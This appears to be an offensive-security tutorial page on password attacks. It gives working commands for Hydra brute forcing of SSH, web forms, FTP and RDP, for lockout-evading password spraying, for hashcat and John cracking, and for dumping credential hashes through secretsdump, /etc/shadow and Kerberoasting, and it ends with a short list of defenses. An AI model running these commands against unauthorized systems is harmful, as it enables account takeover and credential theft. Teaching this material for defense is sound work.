Advanced Pentest & Offensive
Password attacks — brute force, hash cracking (hashcat), password spray
Weak passwords remain the most common entry vector. Understanding how password attacks work enables building effective policies and controls.
Attack types
Brute force: test every possible combination (slow, guaranteed)
Dictionary: test words from a wordlist (fast, covers common cases)
Rule-based: apply transformations to the wordlist (password → P@ssw0rd)
Password spray: one weak password against many users (avoids lockout)
Credential stuffing: use user:password pairs from previous breaches
Hash cracking: crack hashes offline (no target rate limit or lockout)Essential wordlists
# RockYou — 14 million real passwords from a breach
/usr/share/wordlists/rockyou.txt
# SecLists — comprehensive collection
/usr/share/seclists/Passwords/
/usr/share/seclists/Usernames/
# Generate custom wordlist with cewl (terms from target site)
cewl https://example.com -m 5 -d 2 -w custom_wordlist.txtHydra — online brute force
# SSH brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.10
# HTTP POST form
hydra -l admin -P passwords.txt 192.168.1.10 http-post-form \
"/login:username=^USER^&password=^PASS^:Invalid credentials"
# FTP with user list
hydra -L users.txt -P passwords.txt ftp://192.168.1.10
# RDP
hydra -l administrator -P passwords.txt rdp://192.168.1.10 -t 4
# Limit threads to avoid lockout
hydra -l admin -P passwords.txt ssh://192.168.1.10 -t 2 -W 3Password Spray — avoiding account lockout
Strategy: one password at a time, against all users. Stays under lockout threshold (e.g., 5 failed attempts → block).
# Spray against web services
sprayhound -U users.txt -p "Winter2024!" --dc 192.168.1.10
# Spray against SMB/Active Directory
crackmapexec smb 192.168.1.10 -u users.txt -p "Password@2024" --continue-on-success
# Common passwords for spray:
Season+Year: Spring2024, Summer2024, Winter2024
Company+123: ExampleCorp123, Example@1
Common default: Welcome1, Password1, Changeme1Hashcat — offline hash cracking
# Identify hash type
hashid '$2y$10$...' # bcrypt
hashid '5f4dcc3b5aa765d61d8327deb882cf99' # MD5
# Common hashcat modes (-m):
0 = MD5
100 = SHA-1
1000 = NTLM (Windows)
1800 = sha512crypt (Linux /etc/shadow)
3200 = bcrypt
13100 = Kerberoast (TGS-REP)
# Dictionary attack
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt
# Rule-based attack (best cost/benefit ratio)
hashcat -m 1000 hashes.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# Brute force by mask (8 chars, letter+digit)
hashcat -m 1000 hashes.txt -a 3 ?l?l?l?l?d?d?d?d
# Mask characters:
?l = lowercase (a-z)
?u = uppercase (A-Z)
?d = digit (0-9)
?s = special characters
?a = all of the aboveObtaining hashes for cracking
# Windows — local dump (requires admin/SYSTEM)
# Meterpreter: hashdump
# Impacket (remote, admin credentials):
impacket-secretsdump administrator:password@192.168.1.10
# Linux — shadow file (requires root)
cat /etc/shadow
root:$6$salt$hash...:18000:0:99999:7:::
# Kerberoasting — SPNs in Active Directory
impacket-GetUserSPNs -dc-ip 192.168.1.10 example.local/user:password \
-outputfile kerb_hashes.txt
hashcat -m 13100 kerb_hashes.txt rockyou.txtJohn the Ripper — alternative to hashcat
# Simple cracking
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
# With specific format
john --format=NT hashes.txt --wordlist=rockyou.txt
# Combine /etc/passwd and /etc/shadow
unshadow /etc/passwd /etc/shadow > combined.txt
john combined.txt --wordlist=rockyou.txtDefense against password attacks
Against online brute force:
→ Account lockout after N attempts
→ Rate limiting per IP
→ Mandatory MFA
→ CAPTCHA on public forms
→ Monitor failed attempts in SIEM
Against password spray:
→ Alert when same IP tries multiple users
→ Strong password policy (min 12 chars, complexity)
→ Smart lockout (Azure AD, Okta)
Against hash cracking:
→ Use bcrypt, Argon2, or scrypt — never MD5 or SHA-1 for passwords
→ Unique salt per user
→ Server-side pepper (additional secret)Strong password plus MFA eliminates most of these vectors. Defense starts in policy, not detection.